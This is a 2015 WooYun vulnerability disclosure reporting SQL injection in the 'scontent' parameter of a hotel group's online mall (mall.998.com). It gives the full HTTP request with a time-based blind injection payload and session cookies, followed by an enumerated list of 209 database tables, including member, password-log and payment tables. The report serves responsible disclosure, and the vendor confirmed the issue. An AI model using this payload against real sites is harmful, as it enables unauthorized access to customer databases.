当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126522

漏洞标题:格林豪泰酒店管理集团某应用sql注入

相关厂商:格林豪泰酒店管理集团

漏洞作者: 路人甲

提交时间:2015-07-13 18:03

修复时间:2015-08-28 18:50

公开时间:2015-08-28 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

。。。。。。。。

详细说明:

漏洞网站:mall.998.com

GET /grouplist.html?scontent=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://mall.998.com:80/
Cookie: vary=staticdd7e8c7376ac351ea6932ff4d6d30932; s=16dfe4d3343f52e3c99c70de7134a436; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fmall.998.com%2F
Host: mall.998.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


存在漏洞的字段为scontent

w1.png


w4.png


Database: db_b2b2c
[209 tables]
+-----------------------------------------+
| sdb_aftersales_return_log |
| sdb_aftersales_return_product |
| sdb_associate_associate |
| sdb_b2c_brand |
| sdb_b2c_cart |
| sdb_b2c_cart_objects |
| sdb_b2c_comment_goods_point |
| sdb_b2c_comment_goods_type |
| sdb_b2c_counter |
| sdb_b2c_counter_attach |
| sdb_b2c_coupons |
| sdb_b2c_delivery |
| sdb_b2c_delivery_items |
| sdb_b2c_dly_h_area |
| sdb_b2c_dlycorp |
| sdb_b2c_dlytype |
| sdb_b2c_entity_goods |
| sdb_b2c_goods |
| sdb_b2c_goods_cat |
| sdb_b2c_goods_dly |
| sdb_b2c_goods_entity_items |
| sdb_b2c_goods_keywords |
| sdb_b2c_goods_lv_price |
| sdb_b2c_goods_marketable_application |
| sdb_b2c_goods_promotion_ref |
| sdb_b2c_goods_rate |
| sdb_b2c_goods_spec_index |
| sdb_b2c_goods_type |
| sdb_b2c_goods_type_props |
| sdb_b2c_goods_type_props_value |
| sdb_b2c_goods_type_spec |
| sdb_b2c_goods_view_history |
| sdb_b2c_goods_virtual_cat |
| sdb_b2c_member_addrs |
| sdb_b2c_member_advance |
| sdb_b2c_member_comments |
| sdb_b2c_member_coupon |
| sdb_b2c_member_email |
| sdb_b2c_member_goods |
| sdb_b2c_member_lv |
| sdb_b2c_member_msg |
| sdb_b2c_member_point |
| sdb_b2c_member_pwdlog |
| sdb_b2c_member_systmpl |
| sdb_b2c_members |
| sdb_b2c_message_log |
| sdb_b2c_order_coupon_user |
| sdb_b2c_order_delivery |
| sdb_b2c_order_items |
| sdb_b2c_order_log |
| sdb_b2c_order_objects |
| sdb_b2c_order_pmt |
| sdb_b2c_orders |
| sdb_b2c_products |
| sdb_b2c_reship |
| sdb_b2c_reship_items |
| sdb_b2c_sales_rule_goods |
| sdb_b2c_sales_rule_order |
| sdb_b2c_sell_logs |
| sdb_b2c_shop |
| sdb_b2c_spec_values |
| sdb_b2c_specification |
| sdb_b2c_type_brand |
| sdb_base_app_content |
| sdb_base_apps |
| sdb_base_cache_expires |
| sdb_base_files |
| sdb_base_kvstore |
| sdb_base_network |
| sdb_base_queue |
| sdb_base_rpcnotify |
| sdb_base_rpcpoll |
| sdb_base_task |
| sdb_bdlink_link |
| sdb_bdlink_list |
| sdb_business_activity |
| sdb_business_brand |
| sdb_business_comment_orders_point |
| sdb_business_comment_stores_point |
| sdb_business_customer_service |
| sdb_business_dlyaddress |
| sdb_business_dlycorp |
| sdb_business_earnest_log |
| sdb_business_goods_cat |
| sdb_business_goods_cat_conn |
| sdb_business_goods_import_tpl |
| sdb_business_goods_promotion_price |
| sdb_business_ipdata |
| sdb_business_member_stores |
| sdb_business_partner |
| sdb_business_settlement |
| sdb_business_settlement_item |
| sdb_business_store_log |
| sdb_business_store_view_history |
| sdb_business_storecat |
| sdb_business_storegrade |
| sdb_business_storemanger |
| sdb_business_storemember |
| sdb_business_storeregion |
| sdb_business_storeroles |
| sdb_business_storeviolation |
| sdb_business_theme |
| sdb_business_themes |
| sdb_business_themes_file |
| sdb_business_themes_tmpl |
| sdb_business_violation |
| sdb_business_violationcat |
| sdb_business_widgets |
| sdb_business_widgets_instance |
| sdb_business_widgets_proinstance |
| sdb_cellphone_activity |
| sdb_cellphone_activity_rel |
| sdb_cellphone_banner |
| sdb_cellphone_busauction |
| sdb_cellphone_category |
| sdb_cellphone_channel |
| sdb_cellphone_channeltype |
| sdb_cellphone_clearance |
| sdb_cellphone_column |
| sdb_cellphone_columntype |
| sdb_cellphone_feedback |
| sdb_cellphone_perauction |
| sdb_cellphone_phone |
| sdb_cellphone_picad |
| sdb_cellphone_recgoods |
| sdb_cellphone_recstore |
| sdb_cellphone_tag |
| sdb_cellphone_tag_rel |
| sdb_complain_complain |
| sdb_complain_complain_comments |
| sdb_complain_reports |
| sdb_complain_reports_cat |
| sdb_complain_reports_comments |
| sdb_content_article_bodys |
| sdb_content_article_indexs |
| sdb_content_article_nodes |
| sdb_couponlog_order_coupon_ref |
| sdb_couponlog_order_coupon_user |
| sdb_dbeav_meta_register |
| sdb_dbeav_meta_value_datetime |
| sdb_dbeav_meta_value_decimal |
| sdb_dbeav_meta_value_int |
| sdb_dbeav_meta_value_longtext |
| sdb_dbeav_meta_value_text |
| sdb_dbeav_meta_value_varchar |
| sdb_dbeav_recycle |
| sdb_desktop_filter |
| sdb_desktop_flow |
| sdb_desktop_hasrole |
| sdb_desktop_menus |
| sdb_desktop_recycle |
| sdb_desktop_role_flow |
| sdb_desktop_roles |
| sdb_desktop_tag |
| sdb_desktop_tag_rel |
| sdb_desktop_user_flow |
| sdb_desktop_users |
| sdb_ectools_analysis |
| sdb_ectools_analysis_logs |
| sdb_ectools_currency |
| sdb_ectools_order_bills |
| sdb_ectools_payments |
| sdb_ectools_refunds |
| sdb_ectools_regions |
| sdb_groupbuy_activity |
| sdb_groupbuy_groupapply |
| sdb_groupbuy_memberbuy |
| sdb_image_image |
| sdb_image_image_attach |
| sdb_logisticstrack_logistic_log |
| sdb_mobile_cart |
| sdb_mobile_cart_objects |
| sdb_mobile_members |
| sdb_openid_openid |
| sdb_operatorlog_logs |
| sdb_operatorlogmanage_logs |
| sdb_operatorlogmanage_register |
| sdb_package_activity |
| sdb_package_attendactivity |
| sdb_package_sell_log |
| sdb_pam_account |
| sdb_pam_auth |
| sdb_pam_log |
| sdb_pointprofessional_member_point_task |
| sdb_scorebuy_activity |
| sdb_scorebuy_memberLvScore |
| sdb_scorebuy_memberbuy |
| sdb_search_search |
| sdb_site_city |
| sdb_site_explorers |
| sdb_site_link |
| sdb_site_menus |
| sdb_site_modules |
| sdb_site_route_statics |
| sdb_site_seo |
| sdb_site_themes |
| sdb_site_themes_file |
| sdb_site_themes_tmpl |
| sdb_site_widgets |
| sdb_site_widgets_instance |
| sdb_site_widgets_proinstance |
| sdb_sphinx_goods_order |
| sdb_sphinx_last |
| sdb_spike_activity |
| sdb_spike_memberbuy |
| sdb_spike_spikeapply |
| sdb_timedbuy_activity |
| sdb_timedbuy_businessactivity |
| sdb_timedbuy_memberbuy |
+-----------------------------------------+

漏洞证明:

w4.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-07-14 18:48

厂商回复:

感谢对格林的关注,已通知相关人员进行处理。

最新状态:

暂无


漏洞评价:

评论